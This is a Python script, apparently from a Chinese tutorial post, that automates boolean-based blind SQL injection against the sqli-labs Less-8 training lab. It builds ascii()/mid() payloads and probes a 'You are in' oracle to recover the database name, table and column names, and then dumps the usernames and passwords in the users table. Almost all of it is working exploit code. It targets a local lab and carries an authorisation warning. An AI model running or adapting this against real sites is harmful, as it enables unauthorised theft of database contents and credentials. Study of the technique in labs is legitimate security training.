sqli-labs Less-8 布尔盲注（boolean-based blind SQL injection）

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

#数据库长度
import time

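# Boolean-based blind SQL injection against sqli-labs Less-8.
#
# Less-8 echoes TRUE_MARKER only when the injected WHERE clause is true, so
# every fact about the database is recovered one yes/no question at a time,
# e.g. the hand-written probe the script grew out of:
#   0' or length(database())=8 --+
# The target is the local lab instance by design; do not point this at a host
# you are not explicitly authorised to test.

URL = "http://localhost/sqli-labs-master/Less-8"
TRUE_MARKER = "You are in"  # printed by Less-8 only for a true condition
REQUEST_TIMEOUT = 10  # seconds; without it a stalled lab hangs the script forever
TARGET_TABLE = "users"  # table whose columns and rows are dumped
MAX_INT = 99  # highest length / row count the brute-force tries
MAX_NAME_LEN = 99  # longest identifier walked character by character
MAX_DATA_LEN = 999  # longest GROUP_CONCAT result walked

# ascii() codes tried at each string position: 0 first (ascii('') -- the
# position is past the end of the string), then printable ASCII including the
# space (32) that the original 33..126 range left out.
PROBE_CODES = [0] + list(range(32, 127))


def int_payload(expr, value):
    """Return the injected `id` that is true iff integer SQL expression `expr` equals `value`."""
    return "0' or (%s)=%d#" % (expr, value)


def char_payload(expr, pos, code):
    """Return the injected `id` that is true iff character `pos` (1-based) of
    string expression `expr` has ASCII code `code`.

    Comparing ascii() codes instead of a quoted character fixes two problems
    of the original `mid(...)='c'` form: a quote or backslash in the data can
    no longer break the payload (it was silently skipped), and the match is
    case-exact, whereas the default MySQL collation compares strings
    case-insensitively (which is why the original lowercased everything).
    ifnull() maps a NULL expression (e.g. an empty table) to '' so the walk
    stops at position 1 instead of scanning every position for nothing.
    """
    return "0' or ascii(mid((ifnull((%s),'')) from(%d) for(1)))=%d#" % (expr, pos, code)


def oracle(param):
    """Send `param` as the vulnerable `id` parameter; True iff the page reports a true condition.

    Raises the requests exception for a timeout or connection failure rather
    than treating a dead lab as a run of "false" answers.
    """
    res = requests.get(URL, {'id': param}, timeout=REQUEST_TIMEOUT)
    return TRUE_MARKER in res.text


def probe_int(expr, ask=None, limit=MAX_INT):
    """Brute-force integer expression `expr` over 1..`limit`.

    `ask` is the boolean oracle (a callable taking a payload), defaulting to
    the live lab.  Returns the first matching value, or -1 when the value is
    0 or above `limit` -- the caller's loops then simply do nothing.
    """
    ask = oracle if ask is None else ask
    for value in range(1, limit + 1):
        if ask(int_payload(expr, value)):
            return value
    return -1


def extract_string(expr, ask=None, limit=MAX_NAME_LEN):
    """Recover string expression `expr` one character at a time, at most `limit` characters.

    Stops at the first position whose ascii() code is 0 (past the end).  A
    position matching none of PROBE_CODES (a non-ASCII or control byte) is
    recorded as '?' instead of being dropped, so later positions stay aligned.
    """
    ask = oracle if ask is None else ask
    chars = []
    for pos in range(1, limit + 1):
        for code in PROBE_CODES:
            if ask(char_payload(expr, pos, code)):
                break
        else:
            chars.append('?')
            continue
        if code == 0:
            break
        chars.append(chr(code))
    return ''.join(chars)


def main():
    """Walk the lab: database name, table names, TARGET_TABLE's columns, then its rows."""
    db_len = probe_int("length(database())")
    print('数据库长度为 %d' % db_len)
    database = extract_string("database()")
    print('数据库名为:%s' % database)

    table_count = probe_int(
        "select count(table_name) from information_schema.tables"
        " where table_schema = database()")
    print('表个数为:%d' % table_count)
    # range(-1) is empty, so a failed count yields no names rather than a crash.
    tables = [
        extract_string(
            "select table_name from information_schema.tables"
            " where table_schema = database() limit %d,1" % i)
        for i in range(table_count)]
    print('表名称:%s' % tables)

    column_count = probe_int(
        "select count(column_name) from information_schema.columns"
        " where table_schema = database() and table_name = '%s'" % TARGET_TABLE)
    print('字段个数为:%d' % column_count)
    columns = [
        extract_string(
            "select column_name from information_schema.columns"
            " where table_schema = database() and table_name = '%s' limit %d,1"
            % (TARGET_TABLE, i))
        for i in range(column_count)]
    print('字段名称:%s' % columns)

    time.sleep(5)  # kept from the original; presumably a courtesy pause before the long row walk -- confirm
    # 0x3a (':') separates the fields so id/username/password no longer run
    # together; GROUP_CONCAT still joins rows with ','.  NOTE(review): a ','
    # inside a value splits a row, and the server's group_concat_max_len
    # truncates long output -- check it if the dump looks cut short.
    rows = extract_string(
        "select GROUP_CONCAT(id,0x3a,username,0x3a,password) from %s" % TARGET_TABLE,
        limit=MAX_DATA_LEN)
    data = rows.split(',')
    print('数据为:%s' % data)


if __name__ == "__main__":
    main()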










 

结果:
